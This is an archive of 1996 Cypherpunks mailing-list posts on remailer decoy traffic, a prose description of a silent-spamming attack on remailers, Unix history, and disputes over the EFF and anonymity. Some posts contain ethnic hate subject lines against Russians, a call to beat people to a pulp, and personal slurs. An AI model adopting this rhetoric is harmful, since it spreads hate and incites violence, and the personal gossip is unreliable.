on the information superhighway." From peter.allan at aeat.co.uk Tue Sep 3 14:24:01 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Wed, 4 Sep 1996 05:24:01 +0800 Subject: SRP (from the cutting-room floor) Message-ID: <9609031622.AA26229@clare.risley.aeat.co.uk> JAM> Rather than divert messages, then, I propose that for each input JAM> message there is a 10% chance that a piece of cover traffic is JAM> generated. AB> The way that this kind of attack is frustrated is that dummy messages AB> are created as cover traffic by the remailer, and that at some points AB> messages can be swallowed by a remailer as junk messages. 
Automatic decoy traffic was in my draft, but was not in the slimmed-down document I posted to CP. This was mainly because Lance Cottrell and I agreed on that bit, and thought it could be passed over. Unlike JAM, I was in favour of decoy traffic being _inversely_ related to genuine traffic.

AB> You can still do a spamming attack by recognizing the destination,
AB> rather than the message:

Diversion was intended to make that harder too. Eve's messages won't all go straight where she wants them. They should turn up after some of them completed the diversion, but I suggested that would sometimes be too late to track it further through the chain.

As for "messages can be swallowed by a remailer as junk messages", there's a catch for the unwary in that. See below.

TCM> Note that merely fiddling around with probabilities of transmission, such
TCM> as described above, will not be enough. This just adds a layer of noise,
TCM> which will disappear under a correlation analysis.

Kelsey wrote on 28th June about correlating messages at the points of entry & exit from the remailer network. I don't know what an attacker gains by correlating _inside_ the net.

Here are the bits I omitted before.

DECOY MESSAGES

The sending of decoy messages by users is recommended, and serves to hide statistical correlations between your sending a message and somebody receiving one. This practice should continue.

It is also desirable that a remailer be able to originate decoy messages itself. Advantages include better traffic load following. The remailer knows when traffic is light and can generate more decoys. This could be important at times of low traffic such as public holidays. It would be especially important during a denial-of-service attack. When an attacker prevents messages from reaching the remailer (in the hope of isolating a small number of target messages) a locally-produced set of decoys, immune from the denial-of-service, could be crucial.
DESTINATION Addressing all automatic decoys ultimately to "nobody" would ensure that they circulate in the network and then disappear. Nonconservation of message number should prove annoying to an eavesdropper. (An implementation detail on this will be mentioned later.) Addressing some of them outside the network, to test newsgroups for instance might also be useful - confusing an attacker looking at the point of exit. NUMBER A possible means of matching the traffic would be to use an exponential- along the lines of those in thermodynamics. decoys = max ( D.exp(-kT) , E ) The "max" operator here ensures that every time a batch of messages is sent a minimum number of decoys will be included. Values for the constants can doubtless be suggested by remailer operators familiar with the traffic load. ..... SILENT SPAMMING Re-encryption as discussed here will not do any good if remailers allow "silent spamming". To exploit this feature the attacker addresses his messages to "nobody" (or "null" in Mixmaster jargon). These mails fill the message pool, sweeping out all the target messages, but when they come to be sent they disappear. They do not show on the net, they do not need to be recognised and eliminated from the search. All the attacker sees leaving the spammed host is undiluted target mail. Obviously the remailer should detect messages of this type and process them without storing them in the message pool. Any message that will not be delivered to a remote host comes into this category, including those to most local accounts. I briefly examined the source of 2.0.3 (from ftp://utopia.hacktic.nl/pub/replay/pub/remailer on 11 July 1996) and could not find code to deal with this attack. [Cottrell tells me this is on the to-do list.] 
-- Peter Allan peter.allan at aeat.co.uk From nobody at replay.com Tue Sep 3 14:26:23 1996 From: nobody at replay.com (Anonymous) Date: Wed, 4 Sep 1996 05:26:23 +0800 Subject: KILL ALL RUSSIAN IMIGRANTS Message-ID: <199609031704.TAA02114@basement.replay.com> Return-Path: To: cypherpunks at toad.com Subject: Kill all "libertarians" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 02 Sep 96 15:48:31 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com >From nobody at REPLAY.COM Mon Sep 2 12:26:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 02 Sep 96 15:42:57 EDT for dlv Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18013 for dlv at bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv at bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Message-Id: <199609021626.SAA11752 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: All russians are scum. No exceptions. Return-Path: To: cypherpunks at toad.com Subject: Re: Sen. Leahy's "impeccable cyberspace credentials" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Mon, 02 Sep 96 01:19:37 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all polititions are that bad. > > > You make it sound as if their are no politisions are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. 
All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From attila at primenet.com Tue Sep 3 14:35:02 1996 From: attila at primenet.com (attila) Date: Wed, 4 Sep 1996 05:35:02 +0800 Subject: Blissful? Ignorance (was SCO giving free licenses to UNIX OpenServer) Message-ID: <199609031629.KAA02275@InfoWest.COM> ** Reply to note from Hallam-Baker 09/02/96 5:15pm -0400 --or another Hallam-Baker ignorant rant v. unix, bsd, etc. = Eric Murray wrote: = > = > Scottauge at aol.com writes: = = > > Read, Understand, and Delight... Microsoft maybe in trouble at last. = > = > I doubt it. People don't use Microsoft products because = > of their quality or functionality. = = Errmm.. hate to disappoint but SCO UNIX started life as Xenix which = was written by Microsoft in the dark ages. = = the **original** SCO product and versions up to 3.something **were** xenix --not written by MS, but simple unix V7 which was capable of 64K program and 64K data and would run on a 286. MS had a substantial investment in SCO when the old man was screwing things up (before the old man was forced out for sexual harassment --his brother had long since raped Convergent and was gated). MS had made the V7 deal with Western Electric with Billy thinking he had an exclusive on **the** way to go --better than sliced bread; V7 was not commercially available --only to universities because of a WE consent decree with the government. Billy was in seventh heaven --sure he had the deal of a lifetime! not so: Bell Labs shortly announced the breakup and decided to commercially ship System III --it was available in source code only, but the price was only about $25K in the first go around, and you could produce binaries for sublicensing for $250 or some such --it was not a great price, but it was doable. System III was not restricted to 64K plus 64K.
One of my major contract customers at the time was WE --System V R2 was already available internally, including a decent VAX port (unlike the really piss-poor V32 Berkeley rewrote into BSD 4.2 --offering it back to Bell Labs for free, which was spurned from the Ivory Tower at Murray Hill...) With the WE and AT&T breakup, and the multiple licensing activity, Gates hit the roof --threw several well known major temper tantrums, including at least one at WE/Labs that I am directly aware of. Gates vowed to bury UNIX in all flavours and has had that intention ever since --non-stop. Billy-boy does not carry a grudge lightly --he not only gets very mad and comes off the wall (or handle), but he has every intention of getting even. I've always figured Billy suffers from Tourette's for his mannerisms, his uncontrollable rage, &c. --just has not learned to manage it, and figured his Daddy could solve it all --and now there is an item of $10billion give or take a few --buys a lot of hate. part of Billy's vindictive plan against AT&T involved hiring Dave Cutler from DEC --Cutler was the self-styled leader of the VMS team, also with a bad case of temper-tantrums I saw dave literally shatter an impossible to break WE 500 series telephone simply by "hanging" it up.... (...time to clear the decks!) and that was for NT --great job! Cutler took the deal thinking he had a free hand --at Billy's place? --naive. and Dave had to put up with the Windows legacy... the crap that goes on inside NT is not all Cutler's direct fault. and that is Billy Boy and the SCO club... and death lurking in the alley for unix --but I doubt he will be able to kill it --there is just too large a crowd of professionals who refuse to use MS --not just because the product is crap, but because of Billy. = > > This is for single user home based UNIX systems. = > = > Single-user UNIX isn't all that useful. = matter of opinion --works fine, just like the big guys, on a workstation. so it limits you to one login -???
runs full multi-tasking re-entrant just like multi-user. somewhere along the line, you were standing behind the door and forgot to listen when single user limitations were defined. = Listen to the guys who built it. UNIX = is a program development environment. = that's so ludicrous, it's funny. you figure everyone just sat around playing with themselves? I wouldn't tell that to Thompson, Ritchie, Kernighan and friends... unix was a **tool**. = In the early years it was = interesting because there was source available, that ceased to be = the case years ago. = and AT&T source has always been available at some price. BSD source from 4.2 through the current (and last) 4.4 is freely available, give Walnut Creek $29,00 and you have it all and pay the shipping from Free Software Foundation (GNU) and you have all that too (most of which is on the freeBsd and Linux CDROMs anyway. = Multi-user ain't much better. Listen to the guys who built it. apparently you never figured out there was anything after SCO's initial releases --they were junk as was their first several passes at System III and V -they tried to live with their Xenix Heritage --including trying to make System III run on a 286 --an abysmal product. today SCO is shipping SysV R4+ --the last Labs and Unix International version which also contains all BSD calls which were added by SUN under contract --it's a good solid product. however, despite years of kernel hacking for WE, I still prefer straight BSD flavours. Commercially, SUN leads that pack, followed by DEC with Ultrix which is BSD by another name... HP is sort of System V R4+ Even IBM is Unix --they just call it AIX and it is BSD based --also very solid and thoroughly supported --you can not even get IBM heavy iron without AIX --MVS &c. run as processes. Ken Olsen, founder of DEC, called unix "snake oil." DEC's VMS is good, but was originally a DCL platform.
security is excellent by comparison to early unix, but it is not open (or was not, to be correct) --and source is virtually out of the question. FYI, both unix and VMS are derived from Multics... Today DEC ships Ultrix on everything, and VMS basically only on the mainframes. Ken Olsen was forced out when the sales staff blew Ford Motor Co out of the water on an immense deal, along with an even larger Fed contract --essentially the salesmen refused to sell unix (required in both bid specs) on the hardware.... DEC started sliding, and Ken was "retired." = Today Linux probably represents the future of the UNIX family, it = allows people who want to hack at the OS level access to the sources = of a fully functioning OS. This allows people to add in new kernel = features, schedulers and other exotica without having to write a = whole new O/S. = the only reasons NT will end up in big business is a) politics, b) freebies, and c) intimidation. MIS staffs will not choose it, MSNBC just canned NT 4.0 as worthless junk. Linux has a large base, but it is a warmed over version of Bell System V --rewritten supposedly from scratch by a husband/wife team (I might have believed it had it been the husband/wife team of Peter Conklin who was also on the DEC VMS gig from the gate --I gave him his first job out of Harvard in 1962 --arrogant, but 100%. = Just don't confuse it with "home computing", this is geek computing = and you better have a lot of interest in computing to use it. = that's pure bullshit, again. actually, FreeBSD is easier to handle than Linux and more professionally supported --including ongoing active development, It qualifies as home computing in my book --you take the CD, copy two disks out to kick it off, and say GO. comes up in X windows... geek code? get off your MicroSlop mentality limitation. = Home = computing is the market for users who need a system that's simpler = than a VCR or they can't use it.
= that's total nonsense, your British class system is showing its ignorant face again -you are insulting what little intelligence the American middle class does have... unless you really wish to limit the users to TV set-top boxes which can "surf" a few canned sites from assholes-on-line, etc. the children of the household will never settle for that! = At one time that meant Apple, today = it means Microsoft, it will never mean Linux - not unless someone = can make Linux much much simpler than it is at present and provide = decent WYSIWYG tools such as editors etc. designed for use by aunt = Ethel. = give me a break! your ignorance is showing --it's plain and simple an MS advertising juggernaut! both linux and freebsd have X built in --FreeBSD actually goes directly to X at bootup --and there are plenty of tools, editors, etc in X --and freeBSD runs Linux binaries. and there are a number of high grade packages which are fully supported. Secondly, SUN binaries for X86 are no more expensive than MS is heading for with NT which they will use to "replace" W95 (W95 was just another MicroSlop holding pattern). just a simple fact: MicroSlop advertising buries anything and everything. and, if that does not work: Intimidation is just another form of Communication and Billy's real good at, witness the DOJ and FTC round 2 unfolding now. apparently your schooling is limited to MS courses.... MS is a pure virus on its own, if not the software, then certainly the company. why does MS have 85% of the desktop? --the power of money and lies --and a loud noisy parade with a bandwagon, free beer, and all that good stuff that goes with predatory market practices. fair competition? why should MS be fair when its stated goal is to take a fraction of **every** transaction on any network. Billy has no tolerance for the existence of anything other than Billy's creations and control --total control. It does not matter if W95 crashes more often than 3.1 --upgrade it for more money!
Money is the name of the game at MS, not decent product for a reasonable price. Always has been, always will.... --attila -- Now, with a black jack mule you wish to harness, you walk up, look him in the eye, and hit him with a 2X4 over the left eye. If he blinks, hit him over the right eye! He'll cooperate --so will politicians. From vipul at pobox.com Tue Sep 3 14:44:55 1996 From: vipul at pobox.com (Vipul Ved Prakash) Date: Wed, 4 Sep 1996 05:44:55 +0800 Subject: [NOISE] The Doors Message-ID: <199609031936.TAA00607@fountainhead.net> The Doors was not only about freedom and love, but about crypto too! Notice these lines from the song "Five to One" Old [cipher] gets old and young get stronger May take a week baby, may take longer [to crack] they've [clinton] got the guns and we've got the numbers gonna win we will take 'em over, com'on. :) - Vipul -- Vipul Ved Prakash | - Electronic Security & Crypto vipul at pobox.com | - Internet & Intranets 91 11 2247802 | - Web Development & PERL 198 Madhuban IP Extension | - Linux & Open Systems Delhi, INDIA 110 092 | - (Networked) Multimedia From jimbell at pacifier.com Tue Sep 3 14:48:34 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 4 Sep 1996 05:48:34 +0800 Subject: The Esther Dyson Flap Message-ID: <199609031719.KAA03089@mail.pacifier.com> At 08:11 PM 9/2/96 -0700, Timothy C. May wrote: >Esther Dyson says that anonymity on the Net can do more damage than >anonymity in other forums, and thus may need to be regulated and restricted >in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's >term) has grown up with anonymity, and few people take the anonymous (or >not) rants and charges made in the millions per day with the same degree of >certainty they take print comments. Put another way, there is no clear and >present danger. Indeed, I support the elimination of concepts such as "slander" and "libel" precisely because they cause more harm than good. 
Currently, there is an illusion among ordinary citizens that "if that was untrue, you could sue him for libel!" despite the fact that this is rarely practical. In that way, the law actually adds credibility to what should be an incredible claim. Eliminate libel suits, and you've eliminated any presumption that because it's been spoken or is in print, it's likely to be correct. Jim Bell jimbell at pacifier.com From vznuri at netcom.com Tue Sep 3 14:59:12 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 4 Sep 1996 05:59:12 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609030930.CAA09010@mail6.netcom.com> Message-ID: <199609031737.KAA20451@netcom2.netcom.com> agree with all of BS's points... >Anonymous remailers support several things I want to do, >and that I want other people be able to do: >1) Let people have private conversations without being identified >by third parties. >2) Let people have private conversations without being identified >by each other, voluntarily and respecting each others' rights. >3) Let people broadcast things to the public that they might >be afraid to do otherwise. >4) Let people broadcast things to the public without their >reputations, good or bad, affecting readers' reactions. >5) Let people experiment with different personality and >conversation styles, though this doesn't strictly require anonymity. >6) Let people communicate with government officials without risk. I suspect all these items can be accomplished using means other than anonymous remailers. anonymous remailers are a good start, but possibly there is still technology waiting to be invented to support some of these features. one possibility that I'm very interested in: consider that Usenet was not built from the ground-up to support anonymity, nor was the sendmail system. when anonymity was introduced to Usenet, everyone went crazy, and it was only marginally supported. 
I think I may work on some technical proposals along these lines for future posting here, because much of this dialogue has me thinking. what cpunks might consider doing is creating an alternative message distribution system like Usenet that starts from the premise that anonymous communication is allowed and trying to grow it. btw, McCullagh's and others' claims about "ghettoization" of anonymity strike me as very specious. as long as people can use anonymity in some forum they want, I think that's acceptable. what's the equivalent of a "ghetto" in cyberspace? you can't go into a meeting of professionals wearing a ski mask, although you might be able to create such a forum yourself. does that mean you are in some kind of a "ghetto"? oh, brother. From surya at premenos.com Tue Sep 3 15:07:23 1996 From: surya at premenos.com (Surya Koneru) Date: Wed, 4 Sep 1996 06:07:23 +0800 Subject: rc2 export limits.. Message-ID: Hi, Does anyone know the export limit for RC2 Key size ? --Surya From vznuri at netcom.com Tue Sep 3 15:09:29 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 4 Sep 1996 06:09:29 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: <199609031730.KAA20063@netcom2.netcom.com> >I would put forth that you know nothing of my efforts, and therefore are >in no position to judge me. I would also put forth that the efforts of >EFF, or lack thereof, are quite public. that's my point. an entity that is willing to put its reputation on the line is inherently more valuable than one that is not, imho. all the EFF members have good public track records. what EFF has accomplished is checkered, like any battle-scarred infantry will experience. if you expect unadulterated success, you're not living in the same reality everyone else around here is. granted, EFF has made some serious compromises in their agenda. they're finding their identity.
but it doesn't help to have people rant at them and ignore their notable successes, and tend to criticize them merely because they're a public target. whenever you criticize something, please keep in mind the basic qualification: what is a better alternative? sure, EFF hasn't had stellar success, but then, who has in the agenda they are pursuing? their goals are extremely ambitious and difficult in the current climate. lack of success is proof of the difficulty, not of any incompetence, as I wrote. when you begin to understand this, you won't alienate those you are critical of. EFF members are *tremendously* open to positive comments. instead you harangue them and lose their good will to the point that they may tend to ignore cpunk comments entirely because of your very poor example. >I think any organization that would apply political pressure rather than >bow to it would be an alternative. I think an organization in touch >enough with its own policy to prevent its staff and board from making >embarrassing big brother type proposals to curtail the ability of any of us >to post without attributation would be an alternative. I think an >organization without the internal conflict and strife that has clearly >marred EFF in past and made it a laughable attempt at cohesive political >persuasion would be an alternative. I think an organization that had >official policies on the core issues which it proposes to influence would >be an alternative. why don't you start one then? what you seem to fail to adequately understand is that there is virtually no organization in the world that is free from the difficulties you describe. whenever you have multiple people working together, you aren't going to have clear-cut successes. cpunks are always yelling at anything resembling organization, which really annoys me. EFF has had tremendous powerful successes in areas you are conveniently overlooking, in areas that are hard to measure, such as increasing public awareness.
can you make a good case that EFF has had no positive effect? we may be living in a much darker reality without them. >In short, an organization that had even one of the needed elements of >legislative influence. (Cohesive, directed, persistent, and >uncompromising). our congress does not have this property after centuries of trying. why should a private organization totally transcend it? face it, getting things done in this world can be awfully tricky at times. you make it sound like attacking Clipper or stopping any of the legislation that has made its way into congress is a trivial endeavor. go ahead, please create a counterexample. > What is so shocking about announcing that a >given organization does not support my interests and therefore calling on >others who share my interests not to make financial donations to said >organization? you can criticize an organization without implying the people who contribute to it are incompetent, a distinction that has subtly eluded you so far. > Is there something EFF fears in free speech and political >consensus building? Perhaps if they had a straightforward policy.... no matter what they decide, they will be flamed by someone such as yourself. they do have an agenda. >Phrased another way, who cares what you are tired of hearing? the EFF ranting is periodic, and your own sour comments are a repeated feature of this list. who *are* you? why are you so critical of everything in existence? based on previous rants, you're a habitual sourpuss. >No, but when an organization espouses nothing on a given subject key to >its mission, what does that say? What about when its members espouse >entirely different and even counter productive beliefs? again, you are presuming that anonymity is key to their mission. that's a big leap of faith. there is room for honest disagreement. you haven't heard of their agenda personally, so you are assuming there is none.
from what I have seen, there is a reasonably cohesive agenda going on, and I'm not, like yourself, assuming that it doesn't exist merely because I haven't seen it blared in a noisy advertisement somewhere. I agree with some of the EFF members' comments: anonymity could be a very serious quagmire to support. there are probably better trees to bark up. >I thought its point was to protect cyberspace? of course, the interpretation of what is a threat is subjective. >There aren't many battles to choose. Let's see some action. EFF has lobbied against many of the bills you mention. again, I think you're being unfair in assuming merely because you haven't heard of them accomplishing anything, they haven't. >I do in fact feel the cpunks have a greater track record than EFF. Tell >me, what has EFF done? The list of "cypherpunk" accomplishments in terms >of making the net a better place to be is, in my view, significant. >Certainly the discussion here is livelier than anything I've seen from >EFF. ah, the fundamental illusion that is going on here. discussion alone is WORTHLESS in changing the world. yet we have REAMS of it on the cpunk list. I'd say EFF has *acted* and put enormous effort into its agenda. but it is invisible because it's not easily quantified. ask them how many pamphlets they have printed for the public, how much mail they have sent out to members informing them of developments, etc. consider the high-quality EFF newsletter. is there anything like that in the cpunk area? frankly I think your comparing cpunks to EFF is really laughable. they are not even in the same ballpark. it only shows how warped your concept is of what an "accomplishment" is. >You reveal here the basic character of your objection. You don't like >the fact that I criticized EFF. no, as I stated, criticism is great, but yours is written in such a way as to imply your target is incompetent. your tone has changed significantly in your letter now that I have challenged you on it.
>Well what, EFF, have you done for us LATELY? EFF hasn't done much for anyone who hasn't paid their dues.. >English is not my first language. Start paying my hourly rate to type in >the thousands of words and dozens of legal summaries I send to this list >every month and I will begin to proof read carefully. your legal summaries are impressive. your rabid criticisms leave a sour taste in my mouth. measured criticism, I can deal with. >> and you, like many other cypherpunks and cyberspace weasels, >> have a whine-and-shriek-from-the-shadows bent. > >And your point is? > >You'd like the shadows lifted? Speaking without a true name attached is >somehow evil? really, an opinion without attribution is not worth as much as one with it. there's no escaping this simple concept. I agree that a pseudonym can gain a reputation, but yours has very little associated with it to qualify criticism of EFF imho. so you have posted regularly to the cpunk list. big deal. >This is EFF talking. "The situation is hopeless, bail now to preserve >image." EFF has changed its direction from working in washington. a straw man statement if I ever heard one. From jonl at well.com Tue Sep 3 15:35:21 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 06:35:21 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.16.19960903130738.422f617c@mail.well.com> At 08:06 PM 9/2/96 -0700, James A. Donald wrote: >At 06:52 AM 9/3/96 -0500, Jon Lebkowsky wrote: >> "Uncompromising" is not an "element of legislative influence," at least not >> on this planet. >Therefore the correct strategy is simply to attack any politician who shows >any interest in legislating on our issues. > >We have no friends on Capitol hill, and if we did have friends, it would >still be necessary to denounce them as enemies. As I said, on *this* planet. 
-- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From qut at netcom.com Tue Sep 3 16:32:31 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 07:32:31 +0800 Subject: SRP (from the cutting-room floor) In-Reply-To: <9609031622.AA26229@clare.risley.aeat.co.uk> Message-ID: <199609031909.MAA20276@netcom.netcom.com> This sounds simple to implement by users and remailers, after all, cpunk messages with bad syntax -> /dev/null . Users can implement this quite easily, simply use the cpunk more than you actually need to. You are your best decoy. I muse about the idea of remailers that freely allow anybody to access the queues of the cpunk remailers with http and telnet. If people are using the remailers properly, and the destination is usenet, there's no loss to privacy. This can even be implemented with e-mail destinations, with no loss to privacy that isn't already lost simply by using the net itself. Should this idea be implemented with the cpunk remailers, it can actually prevent the seizure of the server by the authorities, considering how they couldn't get anything they couldn't have already gotten by simply telneting or httping in. There is the reported risk of the timing cryptanalysis attacks, so a queue of messages can be made inaccessible while the actual {en|de}cryption is being done. I plan on doing these things when I can get the Linux/BSD system more figured out than I have. I'm primarily interested in learning, so I plan on keeping an open system, other than the Mixmaster binaries and other stuff affected by ITAR. From wendigo at pobox.com Tue Sep 3 16:35:20 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Wed, 4 Sep 1996 07:35:20 +0800 Subject: PKS RFC Project Message-ID: <199609032023.QAA01688@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- For anyone who is interested in contributing to our experimental RFC for public key servers, I set up a little mailing list for discussion.
pks-rfc at charon.gti.net To subscribe, send a message to pks-rfc-request at charon.gti.net with "subscribe" in the subject field. mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO From qut at netcom.com Tue Sep 3 16:41:10 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 07:41:10 +0800 Subject: rc2 export limits.. In-Reply-To: Message-ID: <199609031938.MAA26356@netcom.netcom.com> ! Hi, Does anyone know the export limit for RC2 Key size ? Who cares? We already know it isn't good enough, if it was, the size or key would be illegal to export. From dlv at bwalk.dm.com Tue Sep 3 16:49:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 07:49:17 +0800 Subject: The most ridiculous SPAM in my lifetime In-Reply-To: <199609030322.WAA13140@manifold.algebra.com> Message-ID: geek at algebra.com (Computer Geek) writes: > This is the American reincarnation of Ostap Bender. > > Next spam from him will be about interplanetary chess congress, > no less I am sure. I'm sure the few cypherpunks who haven't read the Ilf&Petrov book all saw the Mel Brooks movie (the 12 chairs) and recognized the cryptic reference.
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From hack5 at juno.com Tue Sep 3 16:49:17 1996 From: hack5 at juno.com (patrick b cummings) Date: Wed, 4 Sep 1996 07:49:17 +0800 Subject: No Subject Message-ID: <19960902.151101.3470.0.hack5@juno.com> there is a new mailing list for all you hackers just email your name or handle and e-mail address and you'll be subscribed send information to hack5 at juno.com From dlv at bwalk.dm.com Tue Sep 3 16:54:27 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 07:54:27 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <199609022129.OAA02339@myriad> Message-ID: <05XoTD3w165w@bwalk.dm.com> ghio at netcom.com (Matthew Ghio) writes: > $500 tops. 8MB is probably okay, 16 might improve resistance to mailbombs > a bit tho. You can get 486 motherboards for under $100 nowadays. > Do the math: used 486 MB+CPU: $100 > 16MB RAM: $150 > case+powersupply: $50 > 100MB HD: $20 FWIW, a very nice store in NYC called J&R (Park Row) is selling Digital 486 boxes for $600, including 16MB RAM, 540MB hd, and color monitor. I also bought a 16MB thingie for my kid's 486 for $109. > HD Controller: $15 > Dual 16550 Serial Card: $15 > 28800bps Modem: $150 I just got an internal 28.8Kbps modem (including fax) for $100. > ------ > $500 > > And if you really want to run a remailer, I can sell you most of the above, > and I'll even throw in a 340MB IDE HD with Linux+remailers preinstalled! > (Yes, I'm serious.) Are we talking about running a remailer over a dial-up UUCP, the way Julf did? This box runs over dial-up UUCP on 14.4K modem, with two incoming feeds. I may be willing to run a remailer to replace anon.penet.fi - let's discuss t (It used to have an outgoing feed to Moscow, but not anymore.
:-) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mech at eff.org Tue Sep 3 16:55:03 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 07:55:03 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609030615.XAA00596@eff.org> Message-ID: <199609031953.MAA25374@eff.org> [This post may be fwd'd to the CP list if it does not show up there from my sending it.] Bill Stewart typed: > While nobody's called Esther Dyson a Communist here yet, there are > people on the board I disagree with - Mitch Kapor, in particular, has shown who is no longer on the board > signs of being a (gasp!) Democrat! My initial reaction to the EFF's first Democrat v. Republican is largely irrelevant here, though more relevant when you get into infrastructure, universal access, and intellectual property issues - stuff that EFF has touched on here and there, but which is not at the heart of our mission. There are other democrats on our board and staff, as well as Republicans. Even Kapor, however, is very strongly for competition, for entrepreneurs, for markets, and ergo differs from a lot of Democrats in that regard. And no one at EFF that I know of is an extreme liberal or conservative on social issues (both extremes are very censorious - the right of "ungodly" things, and the left of "un-p.c." things). So, again, I'd like to suggest that political party affiliation is approaching meaninglessness. The political axis that counts isn't l. vs. r., but civil libertarian v. authoritarian. No one at EFF is an authoritarian. > year or two was that they were doing some very good things > (the Steve Jackson defense), That was quite a bit more than a year or two ago. :) > and also had people making speeches about > the need to provide everybody with access to the Information SuperHighway. 
> Getting the S.266 anti-crypto-pro-wiretapping bill killed a few years > ago was what convinced me to join them, though their compromise positions > on some of the other anti-freedom bills since then have not helped > my mixed views of the organization. There were no compromise positions. We have 100% opposed implementation of such legislation. In the case of the Digital Telephony Bill (the later version of S.266, drafted by the FBI), we were simply unable to stop it, and instead had to try to strip as much FBI wish list out of it as possible and insert privacy protections. That's not a compromise, that's emergency action. We did everything we could. We are too, for numerous reasons. > Maybe. If it's a good position, it will recognize that anonymity > is a mixed blessing; there are people who use it creatively and > responsibly, like Black Unicorn and Lucky Green, and there are > spammers who abuse it to the detriment of society, like the slimeball > who used my remailer to post hatemail to the gay newsgroups with > somebody else's name attached to the bottom. On the other hand, > free speech is also a mixed blessing; there _are_ things I wish people Such a position is likely to be the one EFF takes if it takes one, which is probable. EFF in generally does not issue extremist position statements, but is careful to examine the risks as well as the benefits, and look for pro-liberty solutions to those risks. > had the good taste not to say, but I'm not going to get in Voltaire's > way while he defends to the death their right to say them... Just as an aside, in case anyone's interested, what Voltaire actually said was, "I never approved either the errors of his book, or the trivial truths he so vigorously laid down. I have, however, stoutly taken his side when absurd men have condemned him for these same truths." The "defend to the death his right to say it" paraphrase is an embellishment. :) -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From dlv at bwalk.dm.com Tue Sep 3 17:03:37 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 08:03:37 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: Enzo Michelangeli writes: > I agree with what you say, and that's exactly why all this thread is out > of focus. Blocking anything on the net is impossible, we know it and, I'm > sure, the Singapore government knows it as well. The filtering proxies Am I the only one to notice the striking similarities between the actions of the SG gubment (kill kill kill) and the self-appointed censors who keep inventing new classes of 'inappropriate' Usenet articles for which they forge cancels? First they forged cancels for any material which was reposted too many times, then binaries cross-posted in non-binary newsgroups (supposedly cross-posting wastes bandwidth), then any articles with "cracking" information on breaking copy-protection... --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Tue Sep 3 17:09:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 08:09:08 +0800 Subject: Voting Monarchist? In-Reply-To: <9609031057.AA17091@cow.net> Message-ID: Bovine Remailer writes: > > Vote Monarchist > > who is the candidate? LaRouche? Harry Brone is a fucking statist. If he weren't, he wouldn't be running for president. Anyone who doesn't advocate killing all kings, presidents, and prime ministers is a fucking statist and should be beaten to a pulp with a rattan stick. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From frissell at panix.com Tue Sep 3 17:09:50 1996 From: frissell at panix.com (Duncan Frissell) Date: Wed, 4 Sep 1996 08:09:50 +0800 Subject: The Esther Dyson Flap Message-ID: <2.2.32.19960903204031.008a7850@panix.com> At 09:42 AM 9/3/96 -0700, Timothy C.
